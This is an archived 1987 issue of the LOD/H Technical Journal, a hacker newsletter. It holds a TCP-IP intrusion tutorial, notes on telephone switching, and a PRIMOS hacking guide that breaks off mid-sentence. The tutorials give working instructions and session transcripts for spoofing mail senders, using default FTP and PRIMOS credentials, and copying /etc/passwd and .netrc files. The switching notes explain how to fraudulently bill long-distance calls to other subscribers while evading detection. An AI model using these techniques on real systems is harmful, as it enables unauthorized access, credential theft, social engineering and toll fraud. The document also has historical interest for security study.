💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › LOD › lod-2 captured on 2022-06-12 at 13:05:43.
-=-=-=-=-=-=-
THE
LOD/H TECHNICAL JOURNAL
-----------------------
INTRODUCTION:
This is issue #2, we had originally planned to put out 6 issues a year,
but it looks as if this will become a quarterly newsletter instead. This is due
to the fact that the articles take months to fully research, write, and edit.
By year end, we hope to show that we are not a "fly-by-night" newsletter and
will continue to provide you with the same level of information, accuracy, and
originality as this issue and the first. We appreciate those who have been
downloading, storing, and distributing the newsletter in its entirety, and hope
this will continue, as it benefits everyone.
Here is the breakdown of this issue: 1 article on Telecommunications,
4 articles on Datacommunications, and one article in the 'other' category. Two
authors have written articles for Issue 1, and 5 are new. Obviously this Issue
is more hacking related, whereas Issue 1 was more phreaking related. If you
have any material which may be of interest, let us know.
Our 'sponsor' BBS list has been shortened to one dependable board, as
Metal Shop Private, Shadowspawn, Hell Prozen Over, The Private Sector and
Atlantis have all gone down, though some may be back online in the future. Left
is Digital Logic. The usernumber/usernames for DL follows for those who wish to
get in contact with us. We are open to suggestions for more Sponsor Boards.
Digital Logic: 305-395-6906 New User Pass=DIGIT
LOD/H Technical Journal Staff Account Number is 231.
One last note, a slight clarification on articles. Articles labeled with
letters, ie: Part A & Part B as in last issue's articles on the Outside Loop
Distribution Plant by Phucked Agent 04 and the LOH Telenet Directory along with
this issue's article on Hacking CMS by Lex Luthor are intended to be complete
articles in themselves and should be merged together. They were broken up for
editing and transmission purposes. Articles labeled as Part 1 & Part 2, are
separate articles based on the same subject.
-------------------------------------------------------------------------------
TABLE OF CONTENTS:
01 Introduction to the LOD/H Technical Journal Staff 04 K
and Table Of Contents for Volume 1, Issue 2
02 The Networked Unix Solid State 17 K
03 Step By Step (SXS) Switching System Notes Phantom Phreaker 12 K
04 A Guide to the PRIMOS Operating System Carrier Culprit 25 K
05 Identifying and Defeating Physical Security and Lex Luthor 30 K
Intrusion Detection Systems Part II: The Exterior
06 A Discrete Unix Password Hacker Shooting Shark 09 K
07 Hacking DEC's TOPS-20: Part II Blue Archer 25 K
08 Hacking IBM's VM/CMS Operating System, Part A. Lex Luthor 26 K
09 Hacking IBM's VM/CMS Operating System, Part B. Lex Luthor 25 K
10 Network News & Notes Staff 07 K
Total: 7 articles, 10 files 180 K
-------------------------------------------------------------------------------
The LOD/H Technical Journal: File #2 of 10
----------------------------
The Networked UNIX
:TCP-IP
by:
SOLID STATE
June 23 1987
----------------------------
PREFACE
I've written this article with the assumption that those reading it have a
working knowledge of UNIX and large networks, specifically the DARPA Internet
-- ARPAnet and MILnet. Within I offer guidance on features of the TCP-IP
(Internet Transmission Control Protocol) architecture, such as FTP, TFTP,
TELNET, SMTP, and the UNIX Remote Execution Facilities. Before I commence, I
want to make it known that this file is not intended to be a 'why' file, but
instead a 'how to' tutorial. In the event I get a good response concerning
this document, I may later release a more technical oriented paper from a
programmer's viewpoint.
NOTE: Instances where I give examples of a command format, words in capital
represent variables. For example, in the line '$ telnet HOST', HOST should be
replaced (in LOWERCASE!) by the name of a system. This is just my means of
distinguishing between actual commands and their options.
Control characters are denoted in the form of an exponent, eg. ^H is
control H.
YP DATABASE
Present on every UNIX that supports TCP-IP are a set of files labeled by
programmers as the yellow pages, that serve as a directory of the hosts and
networks accessible by your system. These files are /etc/hosts and
/etc/networks respectively. There may also be a third, /etc/hosts.equiv which
is a listing of those hosts that share resources and/or have users common to
each other. They are ASCII text and have viewable permissions to all.
Therefore it may prove helpful to print these out for reference and easy
access. Entries in the above mentioned take the form:
###.###.###.### host.owner.research nicknames
Example:
18.72.0.39 athena.mit.edu mit-athena athena
The string of numbers, expressed in octal "dot notation", is the NetNumber
of the host. Followed by the complete name, and lastly other names which it is
universally known as. When attempting to access a system, any one of these
identification codes may be used.
NOTE: Most of the databases one will come across are incomplete or may be
outdated. A complete host list can be obtained from the Network Information
Control Center (NIC) at SRI International, the host name is sri-nic.arpa
TELNET
Telnet is the standard facility used for logging into other systems. It is
found not only on UNIX, but TOPS, VMS, and all the other various operating
systems found on the DDN. To activate the program:
% telnet HOST [PORT]
If invoked without arguments, it enters command mode, indicated by the
prompt 'telnet>' From here, many functions are available.
open HOST [PORT]
Open connection to named computer. If PORT, which shall be explained
subsequently, is ommitted then telnet will contact the TELNET server of that
host. As earlier mentioned, systems can be addressed by either their
NetNumber, NetName, or a nickname.
close
Close connection and return to command mode.
quit
End session and exit program.
status
Show current status of telnet. ie. connections and toggled options.
z
Suspend telnet. This allows you to operate an interactive shell on the
local machine while pending an open connection to a remote host.
? COMMAND
Get help on COMMAND. Or if COMMAND is ommitted, then a summary of all
options is printed.
Once a connection has been established, telnet enters input mode where you
can communicate directly with the remote. To return to command mode, enter ^]
A hacking session might look like:
% telnet ucbvax.berkeley.edu
Trying 10.2.0.78 ...
Connected to ucbvax.berkeley.edu.
Escape character is '^]'.
4.3 BSD UNIX (ucbvax.Berkeley.EDU)
login: example
Password: ^D
Connection closed by foreign host.
%
PORTS
Each host on the Internet runs various daemons to perform tedious upkeep
jobs like recording logs, mounting disks and on UNIX, cleaning uucp and /tmp
files. Along with the 'normal' daemons is one ran to accomodate communication
between a host and its peers on a network. inetd the managing daemon of system
to system communication has a number of various services which it regularly
uses, but they can also be manually addressed via telnet. The notation,
predisplayed, is simply:
% telnet HOST PORT
OR
telnet> open HOST PORT
Now each service has a port number associated with it. The number is
decimal, in the range 0-1023. A database of all active services is located in
the ASCII text file /etc/services
From a hacker's view the following are very helpful in the process of
penetrating a system:
79 Finger server. Connecting to this will give a systat report similar
to one a user would get if he was on the target system and issued the finger
command. Once connected to port 79, the host will sit idle until one of two
things: Either a return is pressed and a general finger will result, or a
username is entered where personal info will outcome.
% telnet psuvax1.psu.edu 79
Trying 128.118.6.2 ...
Connected to psuvax1.psu.edu.
Escape character is '^]'.
Login Name TTY Idle When Office
opr The Operator co Sat 19:02 334 Whitmo x5-9723
hager William W. Hager d1 Sat 18:50 237-8876
georg Georg Schnitger 22 1:32 Sat 18:42 315 Whitmo x5-1406
malik Sohail Malik p0 18 Sat 19:16 214c Compu x5-0816
Connection closed by foreign host.
%
11 Systat server. This can not be issued to target UNIX systems, but is
applicable to VMS and TOPS where it returns data like that from finger.
25 SMTP server. This is the server used for mail among systems. It is
also the most vulnerable port to attack as it can be easily fooled. With this
knowledge the hacker can assume any identity he wishes through mail. For
example, to send mail to guest@cc3.bbn.com from root@satnet.arpa, under normal
circumstances one would have to possess the root account wherefrom he would
just enter:
% mail guest@cc3.bbn.com
But this is not always feasible or possible! So we must resort to an
indirect, devious approach..
% telnet cc3.bbn.com 25
Trying 8.3.0.5 ...
Connected to cc3.bbn.com.
Escape character is '^]'.
220 cc3.bbn.com. Sendmail 3.2/SMI-3.2 ready at Fri, 28 Feb 87 17:40:53 PST
rcpt to: guest
250 guest... Recipient ok
mail from: root@satnet.arpa
250 example... Sender ok
data
354 Enter mail, end with "." on a line by itself
This is an example of the SMTP port.
.
250 Mail accepted
^]
telnet> c
Connection closed.
%
To summarize the text above; First, contact the remote at port 25 using
telnet:
% telnet HOST 25
After system link authentication, enter:
rcpt to: USERNAME
Ok? Type in bogus identity:
mail from: USERNAME@HOST
To start message:
data
Now, the mail:
My organization has of late been discussing an upgrade to a Vax
processor. The Sun computer we are currently using is immensely slow (and
getting slower!) due to the demands put on it by the users. If you would allow
me a demo account on your system so I may view its performance, I would be
deeply grateful.
Please respond to me through mail at: bogus!haha!sys1!jeff.
A period on a line by itself will complete the transfer:
.
FTP
FTP is a file transfer program that is quite powerful and helpful to the
hacker in obtaining access to a target. It can be used to send and receive
data. Similar to telnet, the client with which to communicate can be
specified when invoked:
% ftp -n HOST
The -n option I always include as it disables auto-login and net-trace, an
auto-feature which sends the originator's login and system name. The prompt
for FTP is 'ftp>'.
open HOST
Establish connection to the named HOST.
close
Terminate connection and return to command interpreter.
quit
Abort program.
status
Show status parameters.
! COMMAND
Run shell command on local machine. Like the 'z' option of telnet, if
COMMAND is ommitted, than an interactive shell is invoked. ^D will return user
back to the interpreter.
ls
Print a listing of the directory contents on the remote host in an
abbreviated form. To do a long listing, enter 'dir'.
cd REMOTE_DIRECTORY
Change the working directory on server.
pwd
Print working directory on remote.
lcd DIRECTORY
Change the working directory on the local machine to DIRECTORY.
get REMOTE_FILE LOCAL_FILE
Receive the REMOTE_FILE on the remote system and name it LOCAL_FILE on the
local system.
send LOCAL_FILE REMOTE_FILE
Send LOCAL_FILE to the host and name it REMOTE_FILE.
append LOCAL_FILE REMOTE_FILE
Append LOCAL_FILE to the end of the distant file, REMOTE_FILE.
rename REMOTE_FILE NEW_REMOTE_FILE
Give a new name to a remote file.
delete REMOTE_FILE
Kill REMOTE_FILE.
Various other commands exist for bulk transfers and directory management.
If there is any doubt ever on a command, help is always available:
ftp> help COMMAND
Once a connection has been made, the computer will identify itself and then
go idle. (That is, if auto-logging is disabled as it should be.) To login to
the system:
ftp> user USERNAME
Then if a pass is required, the proper prompt will appear.
% ftp -n
ftp> o ll-xn.arpa
Connected to LL-XN.ARPA.
220 ll-xn FTP server (Version 4.103 Wed Jun 25 17:42:33 EDT 1986) ready.
ftp> user anonymous
331 Guest login ok, send ident as password.
Password:
230 Guest login ok, access restrictions apply.
ftp>
Logging on to a FTP server is different than normally entering a machine.
When a remote user is operating FTP, the exchange is treated as a process of
ftp or daemon, not an actual login. Therefore, a different login program,
which restricts use immensely, is used.
If set up properly, FTP will chroot to /usr/spool/ftp where three
directories exist, bin, etc, and pub. Within /usr/spool/ftp/etc is the
password file used for the FTP server login program. It is not a complete
version of that in /etc/passwd, but it can be useful by providing usenames.
Also of mentioning is /etc/ftpusers. This file contains multiple lines
of usernames is like /usr/lib/cron/cron.deny on a Unix System V. If you are
unlucky and your username appears in the file, FTP logins are denied.
A few defaults are present within this doctored version of /etc/passwd that
most always will provide access to a system.
ACCOUNT PASSWORD
=================================
anonymous anonymous, guest, ftp
ftp ftp
guest guest
ftpser ftpser
tftpser tftpser
help help
Each user may have in their home directory a file titled '.netrc'. This is
a file containing usernames and passwords used on systems that a user commonly
converses with. Entries in the file take the form:
machine HOST login USERNAME password PASSWORD
It is advantageous to locate all of these files on your system as they will
expand not only your systems list, but also your chance of entering a
computer.
Once admittance has been gained, I suggest copying the /etc/passwd file for
later attempts at hacking the front end of the system if other routes such as
defaults, finger, TFTP (To be explained hereafter.), or by way of the remote
facilities (Ditto.) are not possible.
ftp> get /etc/passwd pass
200 PORT command okay.
150 Opening data connection for /etc/passwd (26.8.0.14,1389) (47 bytes).
226 Transfer complete.
48 bytes received in 0.32 seconds (0.15 Kbytes/s)
ftp> close
221 Goodbye.
ftp> quit
%
TFTP
The Trivial File Transfer Program is probably the most dangerous aspect of
the TCP-IP structure on the Internet. TFTP requires no account or password be
present on a host system. About the only restriction is that the files
inquired must have public read access permissions set. If not, an
authorization failure error will result. Also, the TFTP server port must be
open, otherwise no transmissions can take place.
% tftp HOST
Once connected, the user will get the 'tftp>' prompt where from he can grab
or send files.
connect HOST
Set HOST up for transfers. There is no actual connection made in the sense
that communication has happened, the program merely remembers what host to be
used in a transfer inquiry. Therefore, there is not a disconnect command.
quit
Exit TFTP.
status
Show current set parameters. ie. HOST and timeout period.
get /PATH/FILE /PATH/FILE
Get /PATH/FILE from HOST and name it /PATH/FILE on local system. If no HOST
has been specified yet, the form may be 'get HOST:/PATH/FILE /PATH/FILE'.
put /PATH/FILE /PATH/FILE
Send /PATH/FILE on local system to HOST and give it the title /PATH/FILE.
As above, if HOST has not been specified, the form is 'put /PATH/FILE
HOST:/PATH/FILE'.
timeout SECONDS
Set timeout parameter. The default is 25, that means abort transmission if
no response from selected host after set period.
? COMMAND
Help with TFTP.
TFTP is the preferred method of file transfer. But is often closed to use
due to its insecurities. To the hacker though, it is wonderful because data
captured are genuine, not doctored versions as is the case with FTP. Therefore
if possible, one will most likely use it to copy /etc/passwd:
% tftp mit-amt
tftp> get /etc/passwd /tmp/passwd
Received 16453 bytes in 7 seconds.
tftp> q
%
REMOTE PROCEDURES
Additional to the standard features of the TCP setup present on all
machines of the net, UNIX has a set of it's own remote system interaction
commands. The set of utilities, which I affectionately call the Remote
Execution Facilities, are usable only between resource sharing UNIX systems.
The conglomeration of remote programs can be very helpful for overtaking other
suspect targets, especially if they are part of a small network unto
themselves besides being major hosts on the Internet.
Before one sets out on the quest of conquering a system, it is wise to know
who is currently logged on:
% rusers -l HOST
Rusers -l alone will print out a listing for all immediate surrounding UNIX
hosts, but if a HOST is specified, only that particular computer will report.
% rlogin HOST -l USERNAME
If -l USERNAME is not included, the account name in use at present time
will be used as the USERNAME when attempting login to HOST. If the username
specified is present locally and on the distant machine in the file
/etc/hosts.equiv, no password is required to login. This can be compromising
to the security, a reason why the security wise will often make
/etc/hosts.equiv a null file.
Each user may optionally have a file, '.rhost', in his home directory. This
is a personal equivalent to /etc/hosts.equiv. If you are logged into an
account with such a file, no pass is required to login (via rlogin), to the
computers named.
Alike to the UUCP protocol, there is an allowance of the Remote Execution
Facilities to preform commands on a networked system:
% rsh HOST -l USERNAME "COMMAND"
Remote shell will permit unlimited commands to be carried out on the remote
as long as the following criteria is met:
The username, if specified (If it is not, the current local one is
used.), must be present on the foreign system and have remote execution
privileges.
Commands are effective according to the environment set in .cshrc and
.login on the host.
An example job:
% rsh century "ps -t console"
If the quotes are ommitted then variables like *?.,\ are taken literally.
Also, if no redirection is submitted, than output, if the command yields it,
is sent back to the issuee.
Remote Copy, a sub-command of rsh, is a command similar to uucp. It must
follow the criteria of Remote Shell plus all files qued must have public read
permissions.
% rcp HOST:/PATH/FILE HOST:/PATH/FILE
For example, a common call would be the password file. So if I wanted to
transfer the /etc/passwd file from harvard.arpa to rutgers:
% rcp harvard.arpa:/etc/passwd rutgers:/tmp/passwd
This format leaves quite alot of flexibility as it stands third party
transfers are possible. If the second HOST is not inserted, than the file is
put on the local system.
A notable option of rcp is directory copy. It will if specified, copy a
directory and all the trees beneath it...allowing you to in theory to copy the
entire file system onto your local host. (uh, oh!)
% rcp -d HOST:/PATH/DIRECTORY_NAME HOST:/PATH/DIRECTORY_NAME
CONCLUSION
In closing I would like to state that I have purposely left much
information uncovered if I felt it would compromise an institution or company.
I apoligize for not explaining many of the subjects discussed in the full
detail they deserve, but if I had this article would have been mammoth.
Any questions, challenges, comments, or criticism can be directed to me,
Solid State, through any of a various boards I visit or to an LOD/H Technical
Journal account of which your mail shall be somehow communicated to me.
Sys Unix Comm
STEP BY STEP SWITCHING NOTES
BY PHANTOM PHREAKER
WRITTEN FOR LOD/H TECHNICAL JOURNAL
The following research was done on a class 5 Step By Step switching system.
Items mentioned in this article are not guaranteed to work with your particular
office. The following interesting topics about Step By Step switching are for
informational and educational purposes only. This article is aimed at people
who wish to learn more about telephone switching systems.
I realize step-by-step switching is dwindling every day, with many
electromechanical SxS offices being replaced with newer electronic/digital
switches and Remote Switching Systems (RSS's). However, rural areas of the U.S.
still use Step, so if you are ever in an area served by a SxS CO you may be
able to use this information.
1:ANI Failure/ONI
To understand this technique, you must understand how ANI functions in the
Step-by-Step switching system. Your CO sends ANI, with your number, in MF or DP
to receivers that collect the ANI information and store it, along with the
called number, on the appropriate form of AMA tape. ANI outpulsing in MF can
use either LAMA (Local Automatic Message Accounting) or CAMA (Centralized
Automatic Message Accounting). ANI sent in DP type signalling can also be used,
but is rare. DP vs MF trunk signalling is similar to the difference between
DTMF and pulse dialing, except on a trunk. DP signalling sends all information
in short bursts of 2600Hz tones.
Causing ANIF's/ONI is an easy task in SxS (and some versions of Xbar),
because the customer's link to the CO will allow the customer to input MF tones
to influence a calls completion. This can be done by dialing a long distance
number and listening to the clicks that follow. After the first click when you
are done dialing, you will hear a few more. They will be timed very close to
one another, and the last click occurs right before the called telephone rings.
The number and speed of the clicks probably varies. Basically what these clicks
are is the Toll Office that serves your CO setting up a route for your call. In
order to abuse this knowledge, you need access to a MF source, whether it be a
blue box, a computer with a good sound chip, tape recording, etc. Right before
you hear the series of clicks, send one of the following sequences in MF:
KP+1 (Repeatedly) For Automatic Number Identification Failure (ANIF)
-or-
KP+2 (Repeatedly) For Operator Number Identification (ONI)
(Note:these will not work if your CO uses DP signalling.)
Play these tones into the phone at a sufficient volume so that they 'drown out'
the series of clicks. Do not send an ST signal, as you are not actually dialing
on a trunk. You must send these MF sequences quickly for this method to work
correctly. After you have played your 'routing' a few times, you will hear a
TSPS operator intercept your call and ask for the number you are calling FROM.
When an ANIF is recognized, the call is cut through to a TSPS site that serves
your area. Now, you can give the operator any number in your exchange and she
will enter the billing information manually, and put the call through. The toll
charges will appear on the customer who owns the number you gave. You can also
accomplish a similar feat by merely flashing the switchook during the series of
clicks. This will send DC pulses that scramble the ANI outpulsing and cause
your call to be sent to a TSPS operator before the dialed number. Be sure to
stop sending the MF 'routing' after the operator attaches or she may know that
something's up. Use this method sparingly and with caution. It would also be a
good idea not to use the same number for billing more than one time. Don't use
this method in excess, because a toll office report will list the number of ANI
failures for a specific time period. The ONI method works better because it is
assumed ONI is needed to identify a caller's DN upon a multi-party line. Too
many ANI failures will generate a report upon a security/maintenance TTY, so if
you plan on using this method, use the ONI method instead of just ANI Failure.
The basic idea behind the ANIF is to scramble your ANI information by using MF
(or the switchhook) to send your LD call to a TSPS operator for Operator Number
Identification (ONI) due to ANI Failure. The idea behind the ONI method is that
you are fooling the switch into thinking you are calling from a multi-party
line and ONI is needed to identify your DN.
2:Test numbers
Some other interesting things in the Step By Step system can be found by
dialing test numbers. Test numbers in SxS switching systems are usually hidden
in the XX99 area, as opposed to 99XX, which is common for other types of
switching systems. These types of numbers are possibly physical limitations of
a SxS switch, and thus a milliwatt tone or other test numbers will be placed
there, because a normal DN can't be assigned such a number. However, these XX99
numbers are usually listed in COSMOS as test numbers. Another interesting note
about XX99 numbers is that they seem (at least in some offices) to be on the
same circuit. (That is, if one person calls an XX99 number and receives a test
tone, and another person calls any other XX99 number in that same prefix, the
second caller will receive a busy signal).
Here we must examine the last four digits of a telephone number in detail.
XXXX=WXYZ W=Thousands digit
X=Hundreds digit
Y=Tens digit
Z=Units digit
Dialing your prefix followed by an XX99 may result in a busy signal test
number, a network overflow (reorder), milliwatt tones, or other type of error
messages encountered when dialing.
Not every XX99 number is a test number, but many are. Try looking for these
in a known Step by Step office.
The numbers that return a busy signal are the ones that incoming callers
are connected to when the Sleeve lead of the called Directory Number is in a
voltage present state, which means the line is in use or off-hook. More about
this in the next topic.
3:Busy signal conferencing
Another interesting feature of the Step-By-Step system is the way busy
tones (60 IPM) are generated. In ESS and DMS central offices, busy signals that
are sent by the terminating switch are computer generated and sound very even
and clear with no signal irregularity. In SxS, all calls to a particular DN are
sent to the same busy signal termination number, which can be reached most of
the time by a POTS number. These busy tones are not computer generated and the
voice path is not cut-off.
You can take advantage of this and possibly have a 'busy signal conference'.
This can be achieved by having several people dial the same busy DN that is
served by a Step office, or by dialing an always-busy termination number. When
you are connected to the busy signal, you will also be able to hear anyone else
who has dialed the same busy number. Connection quality is very poor however,
so this is not a good way to communicate.
As an added bonus, answering supervision is not returned on busy numbers,
and thus the call will be toll-free for all parties involved. However, you must
be using AT&T as your inter-LATA carrier if the call to the busy number is an
inter-LATA call for you. So if your IC is US Sprint, you must first dial the
AT&T Carrier Access Code (10ATT) before the busy number. If your IC doesn't
detect answer supervision, and begins billing immediately or after a certain
amount of time, then you will be billed for the length of the call.
4:Temporarily 'freezing' a line
A SxS switching system that operates on the direct control principle is
controlled directly by what the subscriber dials. Jamming a line on SxS to
prevent service is possible by simply flashing the switchook a number of times.
Or you may find after several aborted dialing attempts, the line will freeze
until it is reset, either manually or by some time-out mechanism. Usually the
time the line is out of action is only a few minutes. The line will return a
busy signal to all callers, and the subscriber who has a 'dead' phone will not
even hear sidetone. This happens when one of the elements in the switch train
gets jammed. The switch train consists of the linefinder, which sends a dial
tone to the subscriber who lifted his telephone, and places voltage on the S
(Sleeve) lead as to mark that given DN as busy. Next in the switch train are
the selectors. The selectors are what receive the digits you dial and move
accordingly. The last step in the switch train is the connector. The connector
is what connects calls that are intraoffice, and sends calls to a Toll office
when necessary. Other types of devices can be used in the switch train, such as
Digit Absorbing Selectors, where needed.
5:Toll/Operator assisted dialing
You may be able to dial 1/0+ numbers with your prefix included in some
areas. You can dial any call that you could normally reach by dialing 1+ or 0+.
For example, to dial an operator-assisted call to a number in Chicago, you
could dial NXX+0312+555+1000 where NXX is your prefix, and you would receive
the usual TSPS bong tone, and the number you dialed, 312+555+1000, would show
up on the TSPS consoles LED readout board. You can also use a 1 in place of the
0 in the above example to put the call through as a normal toll call.
This method does not bypass any type of billing, so don't get your hopes
up high.
The reason this works is twofold. The first reason is that the thousandths
digit in many SxS offices determines the type of call. A 0 or a 1 in place of
another number (which would represent a local call) is handled accordingly. The
other reason is due to a Digit Absorbing Selector that can be installed in some
SxS offices to 'absorb' the prefix on intraoffice calls when it is not needed
to process the call. A DAS can absorb either two or three digits, depending
on whether the CO needs any prefix digit(s) for intraoffice call completion.
6:Hunting prefixes
SxS switches may also translate an improperly dialed local call and send
it to the right area over interoffice trunks. Take for instance, you need to
make a local call to 492-1000. You could dial 292-1000 and reach the exact
same number, provided that there is no 292 prefix within your local calling
area. However, only the first digit of a prefix may be modified or the call
will not go through correctly unless you happen to have dialed a valid local
prefix. You also cannot use a 1 or a 0 in place of the first prefix digit,
because the switch would interpret that as either dialing a toll or an operator
assisted call.
7:Trunks
Step by Step switching system incoming and outgoing trunks are very likely
to use In-band supervisory signalling. This means you could possibly use
numbers served by a SxS CO to blue box off of. But, some older step areas may
not use MF signalling, but DP signalling. DP signalling uses short bursts of
2600Hz to transfer information as opposed to Multi-Frequency tones. In DP
signalling, there are no KP or ST equivalents. Boxing may be accomplished from
DP trunks by sending short bursts of 2600Hz (2 bursts would be the digit 2).
Acceptable pulse rates are 7.5 to 12 pulses per second, but the normal rate is
10 pulses per second. A pulse consists of an 'on hook' (2600Hz) tone and an
off-hook (no tone). So, at 10 pulses per second, a digit might be .04 seconds
of tone and .06 seconds of silence. DP is rarely used today, but some
direct-control Step offices still use it. Common Control Step offices are much
more likely to use MF trunk signalling.
As said at the start of this file, some of the things mentioned here may
have no practical use, but are being exposed to the public and to those who did
not know about any one of the procedures mentioned here previously.
References and acknowledgements
===============================================================================
Basic Telephone Switching Systems-By David Talley, Hayden publishers
No. 1 AMARC-Bell System Technical Journal
Mark Tabas for information about CAMA and DP, The Marauder, and Doom Prophet.
===============================================================================
The LOD/H Technical Journal: File #4 of 10
Written by,
Carrier Culprit
and
The Legion Of Hackers
This is Part I of a II part series on the PRIME
operating system. In this article I will give a
general overview of the system and command usage.
Note: This article will center around the Primos version 19, and revisions 19.1
and up.
[Background Information]
Primos is the operating system for the PRIME mainframe, and supermini
systems. The operating system is usually run on the Prime 750. Primos is a
relatively secure system. Externally security is great, but the internal
security needs help. The latest revision of version 19 is 19.4.0 (as of this
writing). This revision is more secure in both external and internal security
than its predecessors. By the time this article is released, Version 20 should
be out and an article on that version will be forthcoming.
[Logging in V18.x.x]
It is quite easy to hack into a Prime running a version 18 of Primos.
The external security is rather poor. All you need is an ID to logon.
There is no password prompt, thus getting an operator's account is
rather easy. Occasionally, there will be some additional security software
running and passwords will be needed. I am not going to go into detail on
version 18 because it is obsolete, any questions regarding version 18 please
leave me mail.
[Logging in V19.x.x]
A Primos system is very easy to recognize. Once you are connected,
hit a few returns to get the "ER!" prompt or you may be prompted
with the ID prompt. If you do get prompted with the ID prompt, you need
not put "Login" in front of the ID. Here is an example of a Primos login:
ATDT 123-4567
[2 RETURNS]
ER! Login CARRIER
Password:
Prime (user 31) Logged in Friday, 5-Sept 14:27:20
Welcome to Primos Version 19.4.5
Last login Thursday, Sept 4 1986 02:01:12
(1 mail waiting)
Note: You usually get 1 try to login before being disconnected.
In some cases the 2 c/r's are not needed and some systems won't respond until
you type "login" and a return. Passwords and ID's are 6 characters, they may
consist of letters and numbers. Finding passwords on a Primos can be hard, but
there are some common ID's and passwords. You must use "login" before entering
your ID. In this case my ID is "CARRIER". Here is a common list of ID's and
passwords I have come across:
===============================
| ID name | Password |
===============================
| PRIME | PRIME |
| *SYSTEM | SYSTEM |
| PRIMOS | PRIMOS |
| *ADMIN | ADMIN |
| RJE | RJE |
| DEMO | DEMO |
| GAMES | GAMES |
| GUEST | GUEST |
| REGIST | REGIST |
| TEST | TEST |
| NETMAN | NETMAN |
| PRIRUN | PRIRUN |
| TOOLS | TOOLS |
| CMDNC0 | CMDMNC0 |
| +TELENET | TELENET |
===============================
Note: * means that that ID is most likely to have SYS1 priorities.
Note: + account belongs to Telenet or some employees of Telenet in which the
Primos will be located on the Telenet packet network.
System Accounts:
SYSTEM- This account usually contains configuration programs. It
also contains system messages, logs, and userlists.
TOOLS- This account usually contains the utility to add users and the Netlink
utility (Explained later).
CMDNC0- Contains help files.
These are default accounts which are standard in new Primos systems. They
should be there unless the userfile has been modified by the system operator.
You can also mix them around, ie- Login SYSTEM Password:PRIME
There is no "systat" or extensive on-line help before logging in. Don't you
wish people would model their operating systems after TOPS-10 (chuckle)? The
best account to get on under would be an account with SYS1 priorities. This
account is for people who advise regular users. Ok, lets assume you have
hacked onto a regular account something like games.
The command prompt for Primos is "OK,". The first thing we would
want to do is to see who is logged in. We would type "Users" and
would get something like this:
OK, Users
Users=8
This is telling us that there are 8 users currently logged in, which isn't
extremely helpful. To get a full listing of usernames we would type "Status
Users" or "Status -Users". We would get a status of users currently on-line.
It would show us usernames, devices, and other sub-categories. Here's a sample
of what you would get:
User Number Device
ADMIN 3 <MDF0>
SYSTEM 1 <MFD0> <MFD1>
OBB 31 <MFD0>
CRIMINAL 12 <MFD1>
If you see that other people are logged in, it may be best to log off and
call back later, as the operators can perform the same command, and if they
know that user should not be on the system at that time, you will obviously be
kicked off. If there are 2 devices specified, the user is either receiving
output from a different device, sending input to that device, or has logged out
incorrectly (tsk tsk).
To get a full status of memory and accounting, you would type "Status System"
This is usually in a Menu driven program, and you will get different options.
ie- Log of users, memory, devices, etc.
We can access different priority levels by using the "CHAP" command. This is
the way we can find out what our priority level is. We would do:
OK, CHAP UP
OK, CHAP DOWN X or CHAP DOWN
to return to your original priority level:
OK, CHAP ORIGIN or CHAP DEFAULT
Usually a user may leave his priority level rather low. You can then try to
raise your level. There should be 6 different priority levels. A 0 meaning
lowest, and 6 meaning highest. Here is a little diagram that will give you a
list of ID's and what most of them will have access to.
Note: Some may have access to more or less than what I have written, but
the comments are accurate for most systems.
!=================================================!
! ID ! Comments !
!=================================================!
! GAMES !Allows user to view low level !
! !directories, and execute regular!
! !commands. ie-CHAP, STATUS !
!=================================================!
! DEMO !Allows user to run games, and !
! !execute the tour program. Most !
! !commands will not work, and it !
! !has a time limit. Lastly, it can!
! !only access low lvl directories.!
!=================================================!
! PRIME !Allows user to execute all !
! !commands, except operator cmds. !
! !User can also access PRIMENET if!
! !the system supports it. Access !
! !to only low level directories. !
!=================================================!
! ADMIN !Access to view all directories &!
! !bypass all ACL'S. Can setup an !
! !accounts on other Primos systems!
! !via PRIMENET (if available). !
! !User can execute any command. !
!=================================================!
! SYSTEM !Same as ADMIN, except cannot !
! !view feedback to ADMINS. !
!=================================================!
! RJE !Same as games, except a RJE !
! !user can erase user log and spy.!
!=================================================!
! TEST !Able to access any directory, !
! !only restriction is a test user !
! !is not authorized to shut down !
! !the system. !
!=================================================!
Note: RJE is a Remote Job Entry
Priority levels may vary on different Primos systems, they can range from
0- to any number up to 10. The most common range is 0-6. On some Primos
systems you can do a CHAP PRIORITY to see what the range is.
Ok, we have checked priorities, and the system status. Lets move to
directories. To list a directory type "LD" short for List Directory.
This will list the directory you are attached to. In this case it
will be your home directory. You will get a list of files within your own
directory. To view someone elses directory you would type AT nameofdirectory.
Lets say we are logged into a DEMO account. And we would like to
view the files in the GAMES account. We could do either of the following:
OK, AT GAMES
This is telling the system we would like to default to the Games directory.
This is similar to the Set Default name on a VAX/VMS system. (See Lex Luthor's
Hacking VAX/VMS 3 part series for more information on VMS)
or we could do
OK, FUTIL
>AT GAMES
This is the same thing, except in the first method you can still execute
Primos commands while still attached to the Games account. But when using
FUTIL (File UTILity program) you can only list, create and copy files. To get
out of the file utility program just hit a Control P. Here is a chart of file
types and how to execute them:
-------------------------------------------
| File type | How to execute it |
===========================================
| .CPL | CPL pathname |
| .SAVE | SAVE pathname |
| .SEG | SEG pathname |
| .BASICV | BASICV pathname |
| .TXT | SLIST pathname |
| .COM | CO pathname |
-------------------------------------------
Note: SLIST will also show the program lines of the file, whether it be a
CPL file or COM file. This is a good way to learn CPL (Command Procedure
Language).
Most files will not have suffixes. To execute them type "Resume pathname",
filenames are called pathnames on PRIMOS. Unlike VMS, the PRIMOS system
doesn't have the type of file as a suffix. On some files you'll get the
suffix, but if not try: Resume pathname and that should execute the file,
especially files with an "*" preceding them. If a file is in the format of,
"*filename" do "Resume *filename". Usually basic files have an * preceding
their titles.
To create a directory type:
OK, Create directname [-password] [-access]
A password can be from 1-6 letters, if I wanted to have a password on
my directory I would do-
OK, Create directname [-limp] [-access]
If you don't put in an access level, the directory will automatically be
set to ALL access. Here's a list of access rights:
P = Protect a directory
D = Delete entries from directory
A = Add entries to directory
L = Read the contents within directory
U = Attach to a directory
R = Read contents of a file
W = Edit contents of a file
ALL = All of the Above^^^^^
NONE = Denies all access
Typically, if you are logged into a DEMO account your directory will be set
to ALL access. If it is, someone can attach to the demo directory and
do anything they want with it. Here is a list of accounts and what access
they will usually have on their directory.
DEMO = ALL
GAMES = LUR
PRIME = ALL
SYSTEM = LUR
ADMIN = NONE
TEST = LUR
JBB = NONE
RJE = LUR
Most directories have LUR access which is access to read contents of the
directory, attach to the directory, and read contents of a file. If
